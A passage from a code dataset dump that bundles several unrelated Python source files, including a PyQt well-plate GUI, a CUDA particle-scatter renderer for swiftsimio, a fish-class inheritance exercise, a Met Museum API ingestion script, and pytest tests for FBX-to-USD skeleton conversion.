clear_plate_MessageBox.No)\n if clear_plate == clear_plate_MessageBox.Yes:\n changePlate = True\n else: \n changePlate = False\n else:\n changePlate = True\n\n if changePlate:\n self.plate_type = newPlateType\n \n for step in self.StepInformations:\n if self.plate_nr == 0:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = self.plate_type\n if self.plate_nr == 1:\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Type'] = self.plate_type\n\n self.reset(plate_type = self.plate_type, plate_nr = self.plate_nr)\n self.wellButtonBox.deleteLater()\n self.createwellButtonBox()\n Preview_select_Layout = QVBoxLayout()\n Preview_select_Layout.addStretch()\n Preview_select_Layout.addWidget(self.wellButtonBox)\n Preview_select_Layout.addStretch()\n\n self.CurrentStepGBox_Layout.addLayout(Preview_select_Layout)\n\n self.plate_nr_type[self.plate_nr] = self.plate_type\n\n else:\n self.plate_type_CB.blockSignals(True)\n if self.plate_type == 96:\n self.plate_type_CB.setCurrentIndex(0)\n elif self.plate_type == 24:\n self.plate_type_CB.setCurrentIndex(1)\n elif self.plate_type == 6:\n self.plate_type_CB.setCurrentIndex(2)\n self.plate_type_CB.blockSignals(False)\n\n def duplicate_plate(self):\n clearPlate = False\n if (self.plate_nr == 0 and self.used_wells_plate_2 != {})\\\n or (self.plate_nr == 1 and self.used_wells_plate_1 != {}):\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"Colored wells have already been created for plate {}. Do you still want to continue?\".format(2 if self.plate_nr == 0 else 1), clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n if clear_plate == clear_plate_MessageBox.Yes:\n clearPlate = True\n else:\n clearPlate = True\n\n if clearPlate:\n if self.plate_nr == 0:\n if self.plate_nr_type[1] != self.plate_nr_type[0]:\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Type'] = self.plate_nr_type[0]\n tempWellplate = {}\n for well, settings in self.StepInformations[self.selceted_step][1]['Plate 1 Wells'].items():\n tempSettings = settings.copy()\n tempSettings['position'] = (1, settings['position'][1], settings['position'][2])\n tempWellplate[well] = tempSettings\n self.StepInformations[self.selceted_step][1]['Plate 2 Wells'] = tempWellplate.copy()\n self.used_wells_plate_2 = tempWellplate.copy()\n self.plate_nr_type[1] = self.plate_nr_type[0]\n elif self.plate_nr == 1:\n if self.plate_nr_type[1] != self.plate_nr_type[0]:\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = self.plate_nr_type[1]\n tempWellplate = {}\n for well, settings in self.StepInformations[self.selceted_step][1]['Plate 2 Wells'].items():\n tempSettings = settings.copy()\n tempSettings['position'] = (0, settings['position'][1], settings['position'][2])\n tempWellplate[well] = tempSettings\n self.StepInformations[self.selceted_step][1]['Plate 1 Wells'] = tempWellplate.copy()\n self.used_wells_plate_1 = tempWellplate.copy()\n self.plate_nr_type[0] = self.plate_nr_type[1]\n else:\n return\n\n\n def changeButtonColor(self):\n self.selected_wells = set()\n for button in self.well_buttons:\n self.well_buttons[button].setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = self.well_button_radius))\n self.well_buttons[button].setIcon(QIcon())\n if self.plate_nr == 0:\n for used_well in self.used_wells_plate_1:\n button_color = self.used_wells_plate_1[used_well]['button_color']\n self.well_buttons[used_well].setStyleSheet(\"border-radius : {radius}; border: 1px solid black; background-color: rgb({red},{green},{blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0], green = button_color[1], blue = button_color[2]))\n self.well_buttons[used_well].setIcon(QIcon(self.used_wells_plate_1[used_well]['Icon']))\n elif self.plate_nr == 1:\n for used_well in self.used_wells_plate_2:\n button_color = self.used_wells_plate_2[used_well]['button_color']\n self.well_buttons[used_well].setStyleSheet(\"border-radius : {radius}; border: 1px solid black; background-color: rgb({red},{green},{blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0], green = button_color[1], blue = button_color[2]))\n self.well_buttons[used_well].setIcon(QIcon(self.used_wells_plate_2[used_well]['Icon']))\n\n #Settings\n def changeShape(self, imageType):\n self.selectWellsRB.setChecked(True)\n self.createGradientRB.setChecked(False)\n self.changeSelectionType(0)\n if imageType == 'wellplate':\n self.plate_chooser_CBView.setRowHidden(2, True)\n self.plate_type_CBView.setRowHidden(3, True)\n\n self.plate_type_CB.setCurrentIndex(0)\n self.plate_chooser_CB.setCurrentIndex(0)\n\n self.PlateChooserBox.setDisabled(False)\n self.createGradientRB.setDisabled(False)\n\n self.reset()\n\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = 96\n self.StepInformations[step][1]['Plate 2 Type'] = 96\n\n if imageType == 'custompattern':\n\n self.reset()\n\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = 96\n self.StepInformations[step][1]['Plate 2 Type'] = 96\n\n self.plate_chooser_CBView.setRowHidden(2, False)\n self.plate_type_CBView.setRowHidden(3, False)\n\n self.plate_type_CB.setCurrentIndex(3)\n self.plate_chooser_CB.setCurrentIndex(2)\n\n self.PlateChooserBox.setDisabled(True)\n self.createGradientRB.setDisabled(True)\n\n \n '''\n def framerateChanged(self, framerate = None):\n if framerate is not None:\n self.framerate = framerate\n '''\n\n #Exporting/Reseting\n def reset(self, plate_type = 96, full_step_reset = True, full_reset = False, plate_nr = None):\n self.plate_type = plate_type\n\n if self.plate_type == 96:\n self.plate_width = 8\n self.plate_height = 12\n self.well_button_size = 30\n self.well_button_radius = 15\n elif self.plate_type == 24:\n self.plate_width = 4\n self.plate_height = 6\n self.well_button_size = 60\n self.well_button_radius = 30\n elif self.plate_type == 6:\n self.plate_width = 2\n self.plate_height = 3\n self.well_button_size = 120\n self.well_button_radius = 60\n elif self.plate_type == 0:\n self.plate_width = 1\n self.plate_height = 1\n self.well_button_size = 250\n self.well_button_radius = 125\n\n if full_step_reset or full_reset:\n self.selected_wells = set()\n\n if plate_nr == 0:\n self.used_wells_plate_1 = {}\n self.plate_nr = 0\n elif plate_nr == 1:\n self.used_wells_plate_2 = {}\n self.plate_nr = 1\n else:\n self.used_wells_plate_1 = {}\n self.used_wells_plate_2 = {}\n self.plate_nr_type[0] = 96\n self.plate_nr_type[1] = 96\n self.plate_nr = 0\n self.plate_chooser_CB.setCurrentIndex(0)\n self.plate_type_CB.setCurrentIndex(0)\n\n if full_reset:\n for step in range(self.amount_of_steps):\n self.StepGBoxes[step+1][1].deleteLater()\n del self.StepGBoxes[step+1]\n self.StepGBoxes = {}\n self.StepInformations = {}\n self.amount_of_steps = 1\n self.selceted_step = 1\n self.addStepBox()\n self.changeStep(1)\n self.changeShape('wellplate')\n\n self.changeButtonColor()\n \n self.width_gradient.blockSignals(True)\n self.height_gradient.blockSignals(True)\n self.selectWellsRB.setChecked(True)\n self.color_chooser.setCurrentIndex(0)\n self.waveTypeCB.setCurrentIndex(0)\n self.width_gradient.setMaximum(self.plate_width)\n self.height_gradient.setMaximum(self.plate_height)\n self.width_gradient.setValue(self.plate_width)\n self.height_gradient.setValue(self.plate_height)\n self.color_chooser_gradient.setCurrentIndex(0)\n self.direction_chooser_gradient.setCurrentIndex(0)\n self.max_gradient.setValue(255)\n self.min_gradient.setValue(0)\n self.width_gradient.blockSignals(False)\n self.height_gradient.blockSignals(False)\n\n def getStepInfo(self):\n stepInfo = {'Plate 1 Wells': self.used_wells_plate_1, 'Plate 1 Type': self.plate_nr_type[0],\\\n 'Plate 2 Wells': self.used_wells_plate_2, 'Plate 2 Type': self.plate_nr_type[1]}\n\n return stepInfo\n\n def loadStepInfo(self, stepInfo):\n self.reset(plate_type = self.plate_type, plate_nr = self.plate_nr)\n\n if self.plate_nr == 0:\n self.plate_chooser_CB.setCurrentIndex(0)\n if self.plate_nr == 1:\n self.plate_chooser_CB.setCurrentIndex(1)\n \n if self.plate_nr_type[self.plate_nr] == 96:\n self.plate_type_CB.setCurrentIndex(0)\n if self.plate_nr_type[self.plate_nr] == 24:\n self.plate_type_CB.setCurrentIndex(1)\n if self.plate_nr_type[self.plate_nr] == 6:\n self.plate_type_CB.setCurrentIndex(2)\n\n self.used_wells_plate_1 = stepInfo['Plate 1 Wells']\n self.used_wells_plate_2 = stepInfo['Plate 2 Wells']\n \n self.changeButtonColor()\n\n def getPlateInfo(self):\n\n return self.StepInformations\n\n def loadPlateInfo(self, plateInfo):\n if not isinstance(plateInfo, dict):\n plateInfo = ast.literal_eval(plateInfo)\n\n oldtype = self.StepInformations[1][1]['Plate 1 Type']\n #self.reset(full_reset = True, plate_nr = 0)\n\n while self.amount_of_steps < len(plateInfo):\n self.addStep()\n\n self.StepInformations = plateInfo\n\n for step in self.StepInformations:\n self.updateDuration_SB(step)\n\n self.plate_type = self.StepInformations[1][1]['Plate 1 Type']\n\n self.plate_nr_type[0] = self.StepInformations[1][1]['Plate 1 Type']\n self.plate_nr_type[1] = self.StepInformations[1][1]['Plate 2 Type']\n\n self.loadStepInfo(self.StepInformations[self.selceted_step][1])\n\n #Copy/Paste\n def copy_wells(self):\n selectedWellsInfo = []\n for well in self.selected_wells:\n if self.plate_nr == 0:\n if well in self.used_wells_plate_1.keys():\n selectedWellsInfo.append(self.used_wells_plate_1[well])\n else:\n if well in self.used_wells_plate_2.keys():\n selectedWellsInfo.append(self.used_wells_plate_2[well])\n self.clipboard = sorted(selectedWellsInfo, key=lambda pos: (pos['position'][1], pos['position'][2]))\n self.selected_wells = set()\n self.changeButtonColor()\n\n def cut_wells(self):\n selectedWellsInfo = []\n for well in self.selected_wells:\n if self.plate_nr == 0:\n if well in self.used_wells_plate_1.keys():\n selectedWellsInfo.append(self.used_wells_plate_1[well])\n del self.used_wells_plate_1[well]\n else:\n if well in self.used_wells_plate_2.keys():\n selectedWellsInfo.append(self.used_wells_plate_2[well])\n del self.used_wells_plate_2[well]\n sortedPositions = sorted(selectedWellsInfo, key=lambda pos: (pos['position'][1], pos['position'][2]))\n self.selected_wells = set()\n self.changeButtonColor()\n\n def paste_wells(self):\n if len(self.selected_wells) == 1:\n well_to_paste = self.Button_to_pos[next(iter(self.selected_wells))]\n pasted_wells = []\n if self.plate_nr == 0:\n for well in self.clipboard:\n newpos = (0, well['position'][1]-self.clipboard[0]['position'][1]+well_to_paste[0], well['position'][2]-self.clipboard[0]['position'][2]+ well_to_paste[1])\n try:\n self.used_wells_plate_1[self.Pos_to_Button[(newpos[1], newpos[2])]] = well.copy()\n self.used_wells_plate_1[self.Pos_to_Button[(newpos[1], newpos[2])]]['position'] = newpos\n except:\n pass\n else:\n for well in self.clipboard:\n newpos = (1, well['position'][1]-self.clipboard[0]['position'][1]+well_to_paste[0], well['position'][2]-self.clipboard[0]['position'][2]+ well_to_paste[1])\n try:\n self.used_wells_plate_2[self.Pos_to_Button[(newpos[1], newpos[2])]] = well.copy()\n self.used_wells_plate_2[self.Pos_to_Button[(newpos[1], newpos[2])]]['position'] = newpos\n except:\n pass\n self.selected_wells = set()\n self.changeButtonColor()\n","repo_name":"santkumar/diya","sub_path":"software/gui/mainWidget.py","file_name":"mainWidget.py","file_ext":"py","file_size_in_byte":76222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28935384442","text":"from math import sqrt, ceil\nfrom numpy import float64, float32, int32, ndarray\nfrom swiftsimio.optional_packages import (\n CUDA_AVAILABLE,\n cuda_jit,\n CudaSupportError,\n cuda,\n)\n\nkernel_gamma = float32(1.897367)\n\n\n@cuda_jit(\"float32(float32, float32)\", device=True)\ndef kernel(r: float32, H: float32):\n \"\"\"\n Single precision kernel implementation for swiftsimio.\n\n This is the Wendland-C2 kernel as shown in Denhen & Aly (2012) [1]_.\n\n Parameters\n ----------\n\n r : float32\n radius used in kernel computation\n\n H : float32\n kernel width (i.e. radius of compact support for the kernel)\n\n Returns\n -------\n\n float32\n Contribution to the density by the particle\n\n References\n ----------\n\n .. [1] Dehnen W., Aly H., 2012, MNRAS, 425, 1068\n\n Notes\n -----\n\n This is the cuda-compiled version of the kernel, designed for use\n within the gpu backend. It has no double precision cousin.\n \"\"\"\n kernel_constant = float32(2.22817109)\n\n inverse_H = 1.0 / H\n ratio = r * inverse_H\n\n kernel = 0.0\n\n if ratio < 1.0:\n one_minus_ratio = 1.0 - ratio\n one_minus_ratio_2 = one_minus_ratio * one_minus_ratio\n one_minus_ratio_4 = one_minus_ratio_2 * one_minus_ratio_2\n\n kernel = max(one_minus_ratio_4 * (1.0 + 4.0 * ratio), 0.0)\n\n kernel *= kernel_constant * inverse_H * inverse_H\n\n return kernel\n\n\n@cuda_jit(\n \"void(float64[:], float64[:], float32[:], float32[:], float64, float64, float32[:,:])\"\n)\ndef scatter_gpu(\n x: float64,\n y: float64,\n m: float32,\n h: float32,\n box_x: float64,\n box_y: float64,\n img: float32,\n):\n \"\"\"\n Creates a weighted scatter plot\n\n Computes contributions to from particles with positions\n (`x`,`y`) with smoothing lengths `h` weighted by quantities `m`.\n This includes periodic boundary effects.\n\n Parameters\n ----------\n\n x : np.array[float64]\n array of x-positions of the particles. Must be bounded by [0, 1].\n\n y : np.array[float64]\n array of y-positions of the particles. Must be bounded by [0, 1].\n\n m : np.array[float32]\n array of masses (or otherwise weights) of the particles\n\n h : np.array[float32]\n array of smoothing lengths of the particles\n\n box_x: float64\n box size in x, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n box_y: float64\n box size in y, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n img : np.array[float32]\n The output image.\n\n Notes\n -----\n\n Explicitly defining the types in this function allows\n for a performance improvement. This is the cuda version,\n and as such can only be ran on systems with a supported\n GPU. Do not call this where cuda is not available (checks\n can be performed using\n ``swiftsimio.optional_packages.CUDA_AVAILABLE``)\n \"\"\"\n # Output array for our image\n res = img.shape[0]\n maximal_array_index = int32(res) - 1\n\n # Change that integer to a float, we know that our x, y are bounded\n # by [0, 1].\n float_res = float32(res)\n pixel_width = 1.0 / float_res\n\n # We need this for combining with the x_pos and y_pos variables.\n float_res_64 = float64(res)\n\n # Pre-calculate this constant for use with the above\n inverse_cell_area = res * res\n\n # get the particle index and the x and y index of its periodic copy\n i, dx, dy = cuda.grid(3)\n if i < len(x):\n # Get the correct particle\n mass = m[i]\n hsml = h[i]\n x_pos = x[i] + (dx - 1.0) * box_x\n y_pos = y[i] + (dy - 1.0) * box_y\n\n # Calculate the cell that this particle; use the 64 bit version of the\n # resolution as this is the same type as the positions\n particle_cell_x = int32(float_res_64 * x_pos)\n particle_cell_y = int32(float_res_64 * y_pos)\n\n # SWIFT stores hsml as the FWHM.\n kernel_width = kernel_gamma * hsml\n\n # The number of cells that this kernel spans\n cells_spanned = int32(1.0 + kernel_width * float_res)\n\n if (\n particle_cell_x + cells_spanned < 0\n or particle_cell_x - cells_spanned > maximal_array_index\n or particle_cell_y + cells_spanned < 0\n or particle_cell_y - cells_spanned > maximal_array_index\n ):\n # Can happily skip this particle\n return\n\n if cells_spanned <= 1:\n # Easygame, gg\n if (\n particle_cell_x >= 0\n and particle_cell_x <= maximal_array_index\n and particle_cell_y >= 0\n and particle_cell_y <= maximal_array_index\n ):\n cuda.atomic.add(\n img, (particle_cell_x, particle_cell_y), mass * inverse_cell_area\n )\n else:\n # Now we loop over the square of cells that the kernel lives in\n for cell_x in range(\n # Ensure that the lowest x value is 0, otherwise we'll segfault\n max(0, particle_cell_x - cells_spanned),\n # Ensure that the highest x value lies within the array bounds,\n # otherwise we'll segfault (oops).\n min(particle_cell_x + cells_spanned + 1, maximal_array_index + 1),\n ):\n # The distance in x to our new favourite cell\n # remember that our x, y are all in a box of [0, 1]\n # calculate the distance to the cell center\n distance_x = (float32(cell_x) + 0.5) * pixel_width\n distance_x -= float32(x_pos)\n distance_x_2 = distance_x * distance_x\n for cell_y in range(\n max(0, particle_cell_y - cells_spanned),\n min(particle_cell_y + cells_spanned + 1, maximal_array_index + 1),\n ):\n distance_y = (float32(cell_y) + 0.5) * pixel_width\n distance_y -= float32(y_pos)\n distance_y_2 = distance_y * distance_y\n\n r = sqrt(distance_x_2 + distance_y_2)\n\n kernel_eval = kernel(r, kernel_width)\n\n cuda.atomic.add(img, (cell_x, cell_y), mass * kernel_eval)\n\n\ndef scatter(\n x: float64,\n y: float64,\n m: float32,\n h: float32,\n res: int,\n box_x: float64 = 0.0,\n box_y: float64 = 0.0,\n) -> ndarray:\n \"\"\"\n Parallel implementation of scatter\n\n Creates a weighted scatter plot. Computes contributions from\n particles with positions (`x`,`y`) with smoothing lengths `h`\n weighted by quantities `m`.\n This includes periodic boundary effects.\n\n Parameters\n ----------\n x : np.array[float64]\n array of x-positions of the particles. Must be bounded by [0, 1].\n\n y : np.array[float64]\n array of y-positions of the particles. Must be bounded by [0, 1].\n\n m : np.array[float32]\n array of masses (or otherwise weights) of the particles\n\n h : np.array[float32]\n array of smoothing lengths of the particles\n\n res : int\n the number of pixels along one axis, i.e. this returns a square\n of res * res.\n\n box_x: float64\n box size in x, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n box_y: float64\n box size in y, in the same rescaled length units as x and y. Used\n for periodic wrapping.\n\n Returns\n -------\n\n np.array[float32, float32, float32]\n pixel grid of quantity\n\n See Also\n --------\n\n scatter : Creates 2D scatter plot from SWIFT data\n\n Notes\n -----\n\n Explicitly defining the types in this function allows\n a performance improvement.\n \"\"\"\n if not CUDA_AVAILABLE or cuda is None:\n raise CudaSupportError(\n \"Unable to load the CUDA extension to numba. This function \"\n \"is only available on systems with supported GPUs.\"\n )\n\n output = cuda.device_array((res, res), dtype=float32)\n output[:] = 0\n\n n_part = len(x)\n if box_x == 0.0:\n n_xshift = 1\n else:\n n_xshift = 3\n if box_y == 0.0:\n n_yshift = 1\n else:\n n_yshift = 3\n # set up a 3D grid:\n # the first dimension are the particles\n # the second and third dimension are the periodic\n # copies for each particle\n threads_per_block = (16, 1, 1)\n blocks_per_grid = (\n ceil(n_part / threads_per_block[0]),\n n_xshift // threads_per_block[1],\n n_yshift // threads_per_block[2],\n )\n scatter_gpu[blocks_per_grid, threads_per_block](x, y, m, h, box_x, box_y, output)\n\n return output.copy_to_host()\n\n\nscatter_parallel = scatter\n","repo_name":"wullm/swiftsimio","sub_path":"swiftsimio/visualisation/projection_backends/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":8728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37387846017","text":"class Fish:\n def __init__(self,first_name,last_name=\"fish\",skeleton=\"bone\",eyelids=False):\n self.first_name=first_name\n self.last_name=last_name\n self.skeleton=skeleton\n self.eyelids=eyelids\n def swim(self):\n print(\"This Fish is swimming\")\n def swim_backwards(self):\n print(\"This fish swim backwards\")\nclass Trout(Fish):\n def __init__(self,water=\"freshwater\"):\n self.water=water\n super().__init__(self)\nterry=Trout()\nterry.first_name=\"Terry\"\nterry.swim()\nterry.swim_backwards()\nprint(\"====coming in super wala keywords=====\")\nprint(terry.water)\nprint(terry.first_name +\"----\"+ terry.last_name+\"----\"+terry.skeleton)\nclass clownfish(Fish):\n def live_catch(self):\n print(\"coming in clown fish block\")\ncasey=clownfish('casey')\nprint(casey.first_name)\ncasey.live_catch()\nclass Shark(Fish):\n def __init__(self,first_name,last_name=\"shark\",skeleton=\"cartilage\",eyelids=True):\n self.first_name=first_name\n self.last_name=last_name\n self.skeleton=skeleton\n self.eyelids=eyelids\n def swim_backwards(self):\n print(\"This cannot swim backwards\")\nrohu=Shark(\"shrkies\")\nprint(\"shark calls come here\")\nprint(rohu.first_name+\"===\"+rohu.last_name+\"===\"+rohu.skeleton+\"=====\"+str(rohu.eyelids))\nrohu.swim()\nrohu.swim_backwards()\n\n","repo_name":"ranvsin2/PythonBasics","sub_path":"fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7594277575","text":"from settings import *\nfrom ArtObjectModel import *\n\nimport requests\nimport json\nimport datetime\nimport os\nimport shutil\n\n\n\ndef main():\n\n r = requests.get('https://collectionapi.metmuseum.org/public/collection/v1/objects')\n\n total = r.json()['total']\n olist = r.json()['objectIDs']\n\n print('There are {} objects.'.format(total))\n\n\n for i in olist[47001:49000]:\n ro = requests.get('https://collectionapi.metmuseum.org/public/collection/v1/objects/'+str(i))\n oj = ro.json()\n if ro.json()['culture'].find('China') != -1 and ro.json()['primaryImage'] and ro.json()['isPublicDomain']:\n if not ArtObject.exists(oj['objectID']):\n print('Found new object')\n mdate = oj['metadataDate'].split('.')[0]\n md = mdate[:-1] if mdate[-1].isalpha() else mdate\n ArtObject.add(oj['objectID'],\n oj['isHighlight'],\n oj['accessionNumber'],\n oj['isPublicDomain'],\n oj['primaryImage'],\n oj['objectName'],\n oj['culture'],\n oj['objectDate'],\n datetime.datetime.fromisoformat(md))\n\nif __name__ == '__main__':\n main()","repo_name":"ladyewilkinson/metoa","sub_path":"builddb.py","file_name":"builddb.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"602676994","text":"import string\nfrom typing import List\n\nimport pytest\n\nimport FbxCommon as fbx\n\nfrom pxr import Usd, UsdGeom, UsdSkel, Sdf, Gf\nfrom data import (\n Joint,\n Mesh,\n SkinBinding,\n TransformableNode,\n scenebuilder,\n Transform,\n Property,\n AnimationCurve,\n)\n\n\ndef validate_skeleton(cache, prim, nodes: List[Joint]):\n def node_to_path(node):\n if node.parent is None or type(node.parent) is not Joint or node.is_root:\n return node.name\n return f\"{node_to_path(node.parent)}/{node.name}\"\n\n node_paths = [node_to_path(node) for node in nodes]\n query = cache.GetSkelQuery(prim)\n\n topology = query.GetTopology()\n joint_order = query.GetJointOrder()\n joint_local_xforms = query.ComputeJointLocalTransforms(Usd.TimeCode.Default())\n for i in range(len(topology)):\n name = Sdf.Path(joint_order[i]).name\n parent = topology.GetParent(i)\n\n try:\n validation_object = nodes[node_paths.index(joint_order[i])]\n except ValueError as e:\n raise ValueError(\n f\"Could not find a match in the validation data for {name}\"\n )\n\n parent_name = Sdf.Path(joint_order[parent]).name if parent >= 0 else None\n validation_parent_name = (\n validation_object.parent.name\n if validation_object.parent is not None\n else None\n )\n\n assert parent_name == validation_parent_name\n\n transform = validation_object.transform\n assert joint_local_xforms[i].ExtractTranslation() == transform.t\n # This assumes xyz rotation order\n decomposed_rot = joint_local_xforms[i].ExtractRotation().Decompose(Gf.Vec3d.XAxis(), Gf.Vec3d.YAxis(), Gf.Vec3d.ZAxis())\n assert Gf.IsClose(decomposed_rot, transform.r, 0.0001)\n\n\n@pytest.fixture\ndef simple_skeleton_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n t = (0.0, 40.0, 0.0)\n r = (90, 0, 0)\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n root_node = Joint(name=\"root\", is_root=True)\n child_1 = Joint(name=\"child_1\", parent=root_node, transform=Transform(t=t, r=r))\n child_2 = Joint(name=\"child_2\", parent=child_1, transform=Transform(t=t, r=r))\n builder.nodes.extend([root_node, child_1, child_2])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_simple_skeleton(simple_skeleton_fbx):\n file_path, nodes = simple_skeleton_fbx\n stage = Usd.Stage.Open(file_path)\n root = None\n skeleton_prim = None\n unknowns = []\n for prim in stage.Traverse():\n if prim.IsA(UsdSkel.Root):\n root = UsdSkel.Root(prim)\n elif prim.IsA(UsdSkel.Skeleton):\n skeleton_prim = UsdSkel.Skeleton(prim)\n else:\n unknowns.append(prim)\n\n assert None not in [root, skeleton_prim]\n assert not unknowns\n\n # The plugin creates a Skeleton prim with the same name as the root joint of the hierarchy it represents\n assert skeleton_prim.GetPrim().GetName() == nodes[0].name\n\n cache = UsdSkel.Cache()\n\n validate_skeleton(cache, skeleton_prim, nodes)\n\n\n@pytest.fixture\ndef multiple_skeletons_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n root_node_a = Joint(name=\"root_a\", is_root=True)\n child_1 = Joint(name=\"child_1\", parent=root_node_a)\n child_2 = Joint(name=\"child_2\", parent=child_1)\n builder.nodes.extend([root_node_a, child_1, child_2])\n root_node_b = Joint(name=\"root_b\", is_root=True)\n child_3 = Joint(name=\"child_1\", parent=root_node_b)\n child_4 = Joint(name=\"child_2\", parent=child_3)\n builder.nodes.extend([root_node_b, child_3, child_4])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_multiple_skeletons(multiple_skeletons_fbx):\n file_path, nodes = multiple_skeletons_fbx\n stage = Usd.Stage.Open(file_path)\n\n skeleton_prims = [\n UsdSkel.Skeleton(prim)\n for prim in stage.Traverse()\n if prim.IsA(UsdSkel.Skeleton)\n ]\n assert len(skeleton_prims) == len([obj for obj in nodes if obj.parent is None])\n\n cache = UsdSkel.Cache()\n\n for skeleton_prim in skeleton_prims:\n validate_skeleton(cache, skeleton_prim, nodes)\n\n\n@pytest.fixture\ndef nested_skeletons_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n null = TransformableNode(name=\"null\")\n root_node_a = Joint(name=\"root\", parent=null, is_root=True)\n child_1 = Joint(name=\"child_1\", parent=root_node_a)\n child_2 = Joint(name=\"child_2\", parent=child_1)\n builder.nodes.extend([null, root_node_a, child_1, child_2])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_nested_skeleton(nested_skeletons_fbx, root_prim_name):\n \"\"\"\n Tests for generating skeletons that are parented to other objects\n but within a SkeletonRoot.\n \"\"\"\n file_path, nodes = nested_skeletons_fbx\n stage = Usd.Stage.Open(file_path)\n\n path_to_skel = \"/\".join([obj.name for obj in nodes[:2]])\n skeleton = UsdSkel.Skeleton.Get(stage, f\"/{root_prim_name}/{path_to_skel}\")\n assert skeleton\n parent = skeleton.GetPrim().GetParent()\n assert parent and not parent.IsA(UsdSkel.Skeleton)\n\n\n@pytest.fixture\ndef mixed_type_hierarchy_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n a = Joint(name=\"A\", is_root=True)\n b = Joint(name=\"B\", parent=a)\n c = TransformableNode(name=\"C\", parent=b)\n d = Joint(name=\"D\", parent=c)\n builder.nodes.extend([a, b, c, d])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_hierarchy_with_mixed_types(mixed_type_hierarchy_fbx, capfd, root_prim_name):\n \"\"\"\n Tests for skeletons that have mixed types in their hierarchy.\n\n Example:\n A (joint) -> B (joint) -> C (null) -> D (joint)\n The outcome of this should be a skeleton with joints A and B, but D is ignored\n as it has a non-skeleton parent.\n\n Note:\n This limitation is artificial and if it is deemed necessary to take _any_ transformable\n within a skeleton hierarchy as a joint, this can be changed in the plugin.\n\n \"\"\"\n file_path, nodes = mixed_type_hierarchy_fbx\n stage = Usd.Stage.Open(file_path)\n\n out, err = capfd.readouterr()\n assert not out\n assert (\n \"warn\" in err.lower() and f'\"{nodes[2].name}\" is not an FbxSkeleton node' in err\n ), \"No warnings have been raised, but were expected\"\n\n skeleton = UsdSkel.Skeleton.Get(stage, f\"/{root_prim_name}/{nodes[0].name}\")\n cache = UsdSkel.Cache()\n query = cache.GetSkelQuery(skeleton)\n joint_order = query.GetJointOrder()\n assert len(joint_order) != len(\n nodes\n ), \"Generated skeleton equates that of source, this is unexpected in this scenario\"\n\n\n@pytest.fixture\ndef skeleton_binding_fbx(fbx_defaults):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n offset = 10.0\n t = Transform(t=(offset, 0.0, 0.0))\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n a = Joint(name=\"A\", is_root=True)\n b = Joint(name=\"B\", parent=a, transform=t)\n c = Joint(name=\"C\", parent=b, transform=t)\n\n geo = Mesh(\n name=\"bound_skin\",\n points=[\n p for x in range(3) for p in ((x * offset, 0, -1), (x * offset, 0, 1))\n ],\n skinbinding=(\n SkinBinding(\n target_joint=a,\n vertex_weights=((0, 1.0), (1, 1.0), (2, 0.25), (3, 0.25)),\n ),\n SkinBinding(target_joint=b, vertex_weights=((2, 0.5), (3, 0.5))),\n SkinBinding(\n target_joint=c,\n vertex_weights=((4, 1.0), (5, 1.0), (2, 0.25), (3, 0.25)),\n ),\n ),\n polygons=[(0, 1, 3), (3, 2, 0), (2, 3, 5), (5, 4, 2)],\n )\n builder.nodes.extend([a, b, c, geo])\n yield str(builder.settings.file_path), builder.nodes\n\n\ndef test_simple_binding(skeleton_binding_fbx, root_prim_name):\n file_path, nodes = skeleton_binding_fbx\n stage = Usd.Stage.Open(file_path)\n cache = UsdSkel.Cache()\n\n # NOTE: While fetching the skinned prim as is would be sufficient, it's important to use the UsdSkelAPI here\n it = iter(stage.Traverse())\n for prim in it:\n if prim.IsA(UsdSkel.Root):\n it.PruneChildren()\n\n root = UsdSkel.Root(prim)\n cache.Populate(root, 